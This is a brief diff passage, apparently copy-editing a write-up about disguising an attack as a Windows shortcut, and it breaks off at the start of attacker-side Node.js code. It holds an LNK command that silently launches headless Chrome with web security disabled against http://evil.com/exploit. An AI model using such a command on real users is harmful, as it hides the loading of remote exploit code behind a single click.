back

 } ]

 Finally, it is necessary to put all this structure in the background as much as possible and reduce it to a single click.
-In order to do that we can use LNK files as it is stated above.
-I created a shortcut for chrome.exe like below.
+To do that we can use LNK files as stated above.
+I created a shortcut for chrome.exe as shown below.

 C:\Windows\System32\cmd.exe /c start chrome --headless --disable-web-security --disable-gpu --user-data-dir=~/chromeTemp http://evil.com/exploit

-We can use this code below on the attacker side (evil.com) to test our method.
+We can use the following code on the attacker side (evil.com) to test our method.

 process.on('unhandledRejection', (err, p) => {